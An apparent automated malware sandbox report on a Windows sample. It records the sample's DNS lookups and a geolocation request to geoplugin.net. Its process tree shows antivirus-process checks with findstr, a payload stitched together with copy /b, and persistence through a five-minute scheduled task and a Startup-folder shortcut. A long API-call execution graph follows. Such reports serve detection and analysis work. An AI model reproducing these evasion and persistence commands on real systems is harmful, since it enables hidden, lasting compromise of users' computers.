                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Dec 19, 2024 23:42:11.794698954 CET1.1.1.1192.168.2.50xb287Name error (3)wnBHxhzUAWNxsjrpdZtUkwTu.wnBHxhzUAWNxsjrpdZtUkwTunonenoneA (IP address)IN (0x0001)false
                                                                                  Dec 19, 2024 23:42:58.344794035 CET1.1.1.1192.168.2.50x8310No error (0)navegacionseguracol24vip.org181.131.217.244A (IP address)IN (0x0001)false
                                                                                  Dec 19, 2024 23:43:00.150248051 CET1.1.1.1192.168.2.50x6cfaNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                  • geoplugin.net
                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.549810178.237.33.50806976C:\Users\user\AppData\Local\Temp\638933\Beth.com
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 19, 2024 23:43:00.275007010 CET71OUTGET /json.gp HTTP/1.1
                                                                                  Host: geoplugin.net
                                                                                  Cache-Control: no-cache
                                                                                  Dec 19, 2024 23:43:01.523915052 CET1171INHTTP/1.1 200 OK
                                                                                  date: Thu, 19 Dec 2024 22:43:01 GMT
                                                                                  server: Apache
                                                                                  content-length: 963
                                                                                  content-type: application/json; charset=utf-8
                                                                                  cache-control: public, max-age=300
                                                                                  access-control-allow-origin: *
                                                                                  Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                                                  Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7503", "geoplugin_longitude":"-74.0014", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                  Click to jump to process

                                                                                  Click to jump to process

                                                                                  Click to dive into process behavior distribution

                                                                                  Click to jump to process

                                                                                  Target ID:0
                                                                                  Start time:17:42:03
                                                                                  Start date:19/12/2024
                                                                                  Path:C:\Users\user\Desktop\nikDoCvpJa.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\nikDoCvpJa.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:1'798'791 bytes
                                                                                  MD5 hash:D2729F574A3BA69A10C00A5992986226
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:2
                                                                                  Start time:17:42:04
                                                                                  Start date:19/12/2024
                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c copy Cab Cab.cmd & Cab.cmd
                                                                                  Imagebase:0x790000
                                                                                  File size:236'544 bytes
                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:3
                                                                                  Start time:17:42:04
                                                                                  Start date:19/12/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff6d64d0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:4
                                                                                  Start time:17:42:07
                                                                                  Start date:19/12/2024
                                                                                  Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:tasklist
                                                                                  Imagebase:0x970000
                                                                                  File size:79'360 bytes
                                                                                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:5
                                                                                  Start time:17:42:07
                                                                                  Start date:19/12/2024
                                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:findstr /I "opssvc wrsa"
                                                                                  Imagebase:0xdf0000
                                                                                  File size:29'696 bytes
                                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:6
                                                                                  Start time:17:42:07
                                                                                  Start date:19/12/2024
                                                                                  Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:tasklist
                                                                                  Imagebase:0x970000
                                                                                  File size:79'360 bytes
                                                                                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:7
                                                                                  Start time:17:42:07
                                                                                  Start date:19/12/2024
                                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                  Imagebase:0xdf0000
                                                                                  File size:29'696 bytes
                                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:8
                                                                                  Start time:17:42:09
                                                                                  Start date:19/12/2024
                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:cmd /c md 638933
                                                                                  Imagebase:0x790000
                                                                                  File size:236'544 bytes
                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:9
                                                                                  Start time:17:42:09
                                                                                  Start date:19/12/2024
                                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:findstr /V "Chosen" Bugs
                                                                                  Imagebase:0xdf0000
                                                                                  File size:29'696 bytes
                                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:10
                                                                                  Start time:17:42:09
                                                                                  Start date:19/12/2024
                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:cmd /c copy /b ..\Wichita + ..\Sign + ..\Idol + ..\Lauren + ..\Rice + ..\Bold + ..\Loops + ..\Shore + ..\Marie g
                                                                                  Imagebase:0x790000
                                                                                  File size:236'544 bytes
                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:11
                                                                                  Start time:17:42:09
                                                                                  Start date:19/12/2024
                                                                                  Path:C:\Users\user\AppData\Local\Temp\638933\Beth.com
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:Beth.com g
                                                                                  Imagebase:0x7c0000
                                                                                  File size:947'288 bytes
                                                                                  MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Antivirus matches:
                                                                                  • Detection: 0%, ReversingLabs
                                                                                  Reputation:moderate
                                                                                  Has exited:false

                                                                                  Target ID:12
                                                                                  Start time:17:42:09
                                                                                  Start date:19/12/2024
                                                                                  Path:C:\Windows\SysWOW64\choice.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:choice /d y /t 5
                                                                                  Imagebase:0xab0000
                                                                                  File size:28'160 bytes
                                                                                  MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:13
                                                                                  Start time:17:42:10
                                                                                  Start date:19/12/2024
                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:cmd /c schtasks.exe /create /tn "Config" /tr "wscript //B 'C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.js'" /sc minute /mo 5 /F
                                                                                  Imagebase:0x790000
                                                                                  File size:236'544 bytes
                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:14
                                                                                  Start time:17:42:10
                                                                                  Start date:19/12/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff6d64d0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:15
                                                                                  Start time:17:42:10
                                                                                  Start date:19/12/2024
                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:schtasks.exe /create /tn "Config" /tr "wscript //B 'C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.js'" /sc minute /mo 5 /F
                                                                                  Imagebase:0x1e0000
                                                                                  File size:187'904 bytes
                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:16
                                                                                  Start time:17:42:10
                                                                                  Start date:19/12/2024
                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberScope.url" & echo URL="C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberScope.url" & exit
                                                                                  Imagebase:0x790000
                                                                                  File size:236'544 bytes
                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:17
                                                                                  Start time:17:42:10
                                                                                  Start date:19/12/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff6d64d0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:18
                                                                                  Start time:17:42:10
                                                                                  Start date:19/12/2024
                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.js"
                                                                                  Imagebase:0x7ff62ce60000
                                                                                  File size:170'496 bytes
                                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:19
                                                                                  Start time:17:42:10
                                                                                  Start date:19/12/2024
                                                                                  Path:C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.com
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.com" "C:\Users\user\AppData\Local\SecureScope Dynamics\r"
                                                                                  Imagebase:0x190000
                                                                                  File size:947'288 bytes
                                                                                  MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Antivirus matches:
                                                                                  • Detection: 0%, ReversingLabs
                                                                                  Has exited:true

                                                                                  Target ID:21
                                                                                  Start time:17:42:20
                                                                                  Start date:19/12/2024
                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.js"
                                                                                  Imagebase:0x7ff62ce60000
                                                                                  File size:170'496 bytes
                                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:22
                                                                                  Start time:17:42:20
                                                                                  Start date:19/12/2024
                                                                                  Path:C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.com
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.com" "C:\Users\user\AppData\Local\SecureScope Dynamics\r"
                                                                                  Imagebase:0x190000
                                                                                  File size:947'288 bytes
                                                                                  MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Reset < >

                                                                                    Execution Graph

                                                                                    Execution Coverage:17.7%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:21%
                                                                                    Total number of Nodes:1482
                                                                                    Total number of Limit Nodes:27
                                                                                    execution_graph 4201 402fc0 4202 401446 18 API calls 4201->4202 4203 402fc7 4202->4203 4204 401a13 4203->4204 4205 403017 4203->4205 4206 40300a 4203->4206 4208 406831 18 API calls 4205->4208 4207 401446 18 API calls 4206->4207 4207->4204 4208->4204 4209 4023c1 4210 40145c 18 API calls 4209->4210 4211 4023c8 4210->4211 4214 407296 4211->4214 4217 406efe CreateFileW 4214->4217 4218 406f30 4217->4218 4219 406f4a ReadFile 4217->4219 4220 4062cf 11 API calls 4218->4220 4221 4023d6 4219->4221 4224 406fb0 4219->4224 4220->4221 4222 406fc7 ReadFile lstrcpynA lstrcmpA 4222->4224 4225 40700e SetFilePointer ReadFile 4222->4225 4223 40720f CloseHandle 4223->4221 4224->4221 4224->4222 4224->4223 4226 407009 4224->4226 4225->4223 4227 4070d4 ReadFile 4225->4227 4226->4223 4228 407164 4227->4228 4228->4226 4228->4227 4229 40718b SetFilePointer GlobalAlloc ReadFile 4228->4229 4230 4071eb lstrcpynW GlobalFree 4229->4230 4231 4071cf 4229->4231 4230->4223 4231->4230 4231->4231 4232 401cc3 4233 40145c 18 API calls 4232->4233 4234 401cca lstrlenW 4233->4234 4235 4030dc 4234->4235 4236 4030e3 4235->4236 4238 405f7d wsprintfW 4235->4238 4238->4236 4239 401c46 4240 40145c 18 API calls 4239->4240 4241 401c4c 4240->4241 4242 4062cf 11 API calls 4241->4242 4243 401c59 4242->4243 4244 406cc7 81 API calls 4243->4244 4245 401c64 4244->4245 4246 403049 4247 401446 18 API calls 4246->4247 4248 403050 4247->4248 4249 406831 18 API calls 4248->4249 4250 401a13 4248->4250 4249->4250 4251 40204a 4252 401446 18 API calls 4251->4252 4253 402051 IsWindow 4252->4253 4254 4018d3 4253->4254 4255 40324c 4256 403277 4255->4256 4257 40325e SetTimer 4255->4257 4258 4032cc 4256->4258 4259 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4256->4259 4257->4256 4259->4258 4260 4022cc 4261 40145c 18 API calls 4260->4261 4262 4022d3 4261->4262 4263 406301 2 API calls 4262->4263 4264 4022d9 4263->4264 4266 4022e8 4264->4266 4269 405f7d wsprintfW 4264->4269 4267 4030e3 4266->4267 4270 405f7d wsprintfW 4266->4270 4269->4266 4270->4267 4271 4030cf 4272 40145c 18 API calls 4271->4272 4273 4030d6 4272->4273 4275 4030dc 4273->4275 4278 4063d8 GlobalAlloc lstrlenW 4273->4278 4276 4030e3 4275->4276 4305 405f7d wsprintfW 4275->4305 4279 406460 4278->4279 4280 40640e 4278->4280 4279->4275 4281 40643b GetVersionExW 4280->4281 4306 406057 CharUpperW 4280->4306 4281->4279 4282 40646a 4281->4282 4283 406490 LoadLibraryA 4282->4283 4284 406479 4282->4284 4283->4279 4287 4064ae GetProcAddress GetProcAddress GetProcAddress 4283->4287 4284->4279 4286 4065b1 GlobalFree 4284->4286 4288 4065c7 LoadLibraryA 4286->4288 4289 406709 FreeLibrary 4286->4289 4290 406621 4287->4290 4294 4064d6 4287->4294 4288->4279 4292 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4288->4292 4289->4279 4291 40667d FreeLibrary 4290->4291 4293 406656 4290->4293 4291->4293 4292->4290 4297 406716 4293->4297 4302 4066b1 lstrcmpW 4293->4302 4303 4066e2 CloseHandle 4293->4303 4304 406700 CloseHandle 4293->4304 4294->4290 4295 406516 4294->4295 4296 4064fa FreeLibrary GlobalFree 4294->4296 4295->4286 4298 406528 lstrcpyW OpenProcess 4295->4298 4300 40657b CloseHandle CharUpperW lstrcmpW 4295->4300 4296->4279 4299 40671b CloseHandle FreeLibrary 4297->4299 4298->4295 4298->4300 4301 406730 CloseHandle 4299->4301 4300->4290 4300->4295 4301->4299 4302->4293 4302->4301 4303->4293 4304->4289 4305->4276 4306->4280 4307 4044d1 4308 40450b 4307->4308 4309 40453e 4307->4309 4375 405cb0 GetDlgItemTextW 4308->4375 4310 40454b GetDlgItem GetAsyncKeyState 4309->4310 4314 4045dd 4309->4314 4312 40456a GetDlgItem 4310->4312 4325 404588 4310->4325 4317 403d6b 19 API calls 4312->4317 4313 4046c9 4373 40485f 4313->4373 4377 405cb0 GetDlgItemTextW 4313->4377 4314->4313 4322 406831 18 API calls 4314->4322 4314->4373 4315 404516 4316 406064 5 API calls 4315->4316 4318 40451c 4316->4318 4320 40457d ShowWindow 4317->4320 4321 403ea0 5 API calls 4318->4321 4320->4325 4326 404521 GetDlgItem 4321->4326 4327 40465b SHBrowseForFolderW 4322->4327 4323 4046f5 4328 4067aa 18 API calls 4323->4328 4324 403df6 8 API calls 4329 404873 4324->4329 4330 4045a5 SetWindowTextW 4325->4330 4334 405d85 4 API calls 4325->4334 4331 40452f IsDlgButtonChecked 4326->4331 4326->4373 4327->4313 4333 404673 CoTaskMemFree 4327->4333 4338 4046fb 4328->4338 4332 403d6b 19 API calls 4330->4332 4331->4309 4336 4045c3 4332->4336 4337 40674e 3 API calls 4333->4337 4335 40459b 4334->4335 4335->4330 4342 40674e 3 API calls 4335->4342 4339 403d6b 19 API calls 4336->4339 4340 404680 4337->4340 4378 406035 lstrcpynW 4338->4378 4343 4045ce 4339->4343 4344 4046b7 SetDlgItemTextW 4340->4344 4349 406831 18 API calls 4340->4349 4342->4330 4376 403dc4 SendMessageW 4343->4376 4344->4313 4345 404712 4347 406328 3 API calls 4345->4347 4356 40471a 4347->4356 4348 4045d6 4350 406328 3 API calls 4348->4350 4351 40469f lstrcmpiW 4349->4351 4350->4314 4351->4344 4354 4046b0 lstrcatW 4351->4354 4352 40475c 4379 406035 lstrcpynW 4352->4379 4354->4344 4355 404765 4357 405d85 4 API calls 4355->4357 4356->4352 4360 40677d 2 API calls 4356->4360 4362 4047b1 4356->4362 4358 40476b GetDiskFreeSpaceW 4357->4358 4361 40478f MulDiv 4358->4361 4358->4362 4360->4356 4361->4362 4363 40480e 4362->4363 4380 4043d9 4362->4380 4364 404831 4363->4364 4366 40141d 80 API calls 4363->4366 4388 403db1 KiUserCallbackDispatcher 4364->4388 4366->4364 4367 4047ff 4369 404810 SetDlgItemTextW 4367->4369 4370 404804 4367->4370 4369->4363 4372 4043d9 21 API calls 4370->4372 4371 40484d 4371->4373 4389 403d8d 4371->4389 4372->4363 4373->4324 4375->4315 4376->4348 4377->4323 4378->4345 4379->4355 4381 4043f9 4380->4381 4382 406831 18 API calls 4381->4382 4383 404439 4382->4383 4384 406831 18 API calls 4383->4384 4385 404444 4384->4385 4386 406831 18 API calls 4385->4386 4387 404454 lstrlenW wsprintfW SetDlgItemTextW 4386->4387 4387->4367 4388->4371 4390 403da0 SendMessageW 4389->4390 4391 403d9b 4389->4391 4390->4373 4391->4390 4392 401dd3 4393 401446 18 API calls 4392->4393 4394 401dda 4393->4394 4395 401446 18 API calls 4394->4395 4396 4018d3 4395->4396 4397 402e55 4398 40145c 18 API calls 4397->4398 4399 402e63 4398->4399 4400 402e79 4399->4400 4401 40145c 18 API calls 4399->4401 4402 405e5c 2 API calls 4400->4402 4401->4400 4403 402e7f 4402->4403 4427 405e7c GetFileAttributesW CreateFileW 4403->4427 4405 402e8c 4406 402f35 4405->4406 4407 402e98 GlobalAlloc 4405->4407 4410 4062cf 11 API calls 4406->4410 4408 402eb1 4407->4408 4409 402f2c CloseHandle 4407->4409 4428 403368 SetFilePointer 4408->4428 4409->4406 4412 402f45 4410->4412 4414 402f50 DeleteFileW 4412->4414 4415 402f63 4412->4415 4413 402eb7 4416 403336 ReadFile 4413->4416 4414->4415 4429 401435 4415->4429 4418 402ec0 GlobalAlloc 4416->4418 4419 402ed0 4418->4419 4420 402f04 WriteFile GlobalFree 4418->4420 4422 40337f 33 API calls 4419->4422 4421 40337f 33 API calls 4420->4421 4423 402f29 4421->4423 4426 402edd 4422->4426 4423->4409 4425 402efb GlobalFree 4425->4420 4426->4425 4427->4405 4428->4413 4430 404f9e 25 API calls 4429->4430 4431 401443 4430->4431 4432 401cd5 4433 401446 18 API calls 4432->4433 4434 401cdd 4433->4434 4435 401446 18 API calls 4434->4435 4436 401ce8 4435->4436 4437 40145c 18 API calls 4436->4437 4438 401cf1 4437->4438 4439 401d07 lstrlenW 4438->4439 4440 401d43 4438->4440 4441 401d11 4439->4441 4441->4440 4445 406035 lstrcpynW 4441->4445 4443 401d2c 4443->4440 4444 401d39 lstrlenW 4443->4444 4444->4440 4445->4443 4446 402cd7 4447 401446 18 API calls 4446->4447 4449 402c64 4447->4449 4448 402d17 ReadFile 4448->4449 4449->4446 4449->4448 4450 402d99 4449->4450 4451 402dd8 4452 4030e3 4451->4452 4453 402ddf 4451->4453 4454 402de5 FindClose 4453->4454 4454->4452 4455 401d5c 4456 40145c 18 API calls 4455->4456 4457 401d63 4456->4457 4458 40145c 18 API calls 4457->4458 4459 401d6c 4458->4459 4460 401d73 lstrcmpiW 4459->4460 4461 401d86 lstrcmpW 4459->4461 4462 401d79 4460->4462 4461->4462 4463 401c99 4461->4463 4462->4461 4462->4463 4464 4027e3 4465 4027e9 4464->4465 4466 4027f2 4465->4466 4467 402836 4465->4467 4480 401553 4466->4480 4468 40145c 18 API calls 4467->4468 4470 40283d 4468->4470 4472 4062cf 11 API calls 4470->4472 4471 4027f9 4473 40145c 18 API calls 4471->4473 4477 401a13 4471->4477 4474 40284d 4472->4474 4475 40280a RegDeleteValueW 4473->4475 4484 40149d RegOpenKeyExW 4474->4484 4476 4062cf 11 API calls 4475->4476 4479 40282a RegCloseKey 4476->4479 4479->4477 4481 401563 4480->4481 4482 40145c 18 API calls 4481->4482 4483 401589 RegOpenKeyExW 4482->4483 4483->4471 4487 4014c9 4484->4487 4492 401515 4484->4492 4485 4014ef RegEnumKeyW 4486 401501 RegCloseKey 4485->4486 4485->4487 4489 406328 3 API calls 4486->4489 4487->4485 4487->4486 4488 401526 RegCloseKey 4487->4488 4490 40149d 3 API calls 4487->4490 4488->4492 4491 401511 4489->4491 4490->4487 4491->4492 4493 401541 RegDeleteKeyW 4491->4493 4492->4477 4493->4492 4494 4040e4 4495 4040ff 4494->4495 4501 40422d 4494->4501 4497 40413a 4495->4497 4525 403ff6 WideCharToMultiByte 4495->4525 4496 404298 4498 40436a 4496->4498 4499 4042a2 GetDlgItem 4496->4499 4505 403d6b 19 API calls 4497->4505 4506 403df6 8 API calls 4498->4506 4502 40432b 4499->4502 4503 4042bc 4499->4503 4501->4496 4501->4498 4504 404267 GetDlgItem SendMessageW 4501->4504 4502->4498 4507 40433d 4502->4507 4503->4502 4511 4042e2 6 API calls 4503->4511 4530 403db1 KiUserCallbackDispatcher 4504->4530 4509 40417a 4505->4509 4510 404365 4506->4510 4512 404353 4507->4512 4513 404343 SendMessageW 4507->4513 4515 403d6b 19 API calls 4509->4515 4511->4502 4512->4510 4516 404359 SendMessageW 4512->4516 4513->4512 4514 404293 4517 403d8d SendMessageW 4514->4517 4518 404187 CheckDlgButton 4515->4518 4516->4510 4517->4496 4528 403db1 KiUserCallbackDispatcher 4518->4528 4520 4041a5 GetDlgItem 4529 403dc4 SendMessageW 4520->4529 4522 4041bb SendMessageW 4523 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4522->4523 4524 4041d8 GetSysColor 4522->4524 4523->4510 4524->4523 4526 404033 4525->4526 4527 404015 GlobalAlloc WideCharToMultiByte 4525->4527 4526->4497 4527->4526 4528->4520 4529->4522 4530->4514 4531 402ae4 4532 402aeb 4531->4532 4533 4030e3 4531->4533 4534 402af2 CloseHandle 4532->4534 4534->4533 4535 402065 4536 401446 18 API calls 4535->4536 4537 40206d 4536->4537 4538 401446 18 API calls 4537->4538 4539 402076 GetDlgItem 4538->4539 4540 4030dc 4539->4540 4541 4030e3 4540->4541 4543 405f7d wsprintfW 4540->4543 4543->4541 4544 402665 4545 40145c 18 API calls 4544->4545 4546 40266b 4545->4546 4547 40145c 18 API calls 4546->4547 4548 402674 4547->4548 4549 40145c 18 API calls 4548->4549 4550 40267d 4549->4550 4551 4062cf 11 API calls 4550->4551 4552 40268c 4551->4552 4553 406301 2 API calls 4552->4553 4554 402695 4553->4554 4555 4026a6 lstrlenW lstrlenW 4554->4555 4557 404f9e 25 API calls 4554->4557 4559 4030e3 4554->4559 4556 404f9e 25 API calls 4555->4556 4558 4026e8 SHFileOperationW 4556->4558 4557->4554 4558->4554 4558->4559 4560 401c69 4561 40145c 18 API calls 4560->4561 4562 401c70 4561->4562 4563 4062cf 11 API calls 4562->4563 4564 401c80 4563->4564 4565 405ccc MessageBoxIndirectW 4564->4565 4566 401a13 4565->4566 4567 402f6e 4568 402f72 4567->4568 4569 402fae 4567->4569 4571 4062cf 11 API calls 4568->4571 4570 40145c 18 API calls 4569->4570 4577 402f9d 4570->4577 4572 402f7d 4571->4572 4573 4062cf 11 API calls 4572->4573 4574 402f90 4573->4574 4575 402fa2 4574->4575 4576 402f98 4574->4576 4579 406113 9 API calls 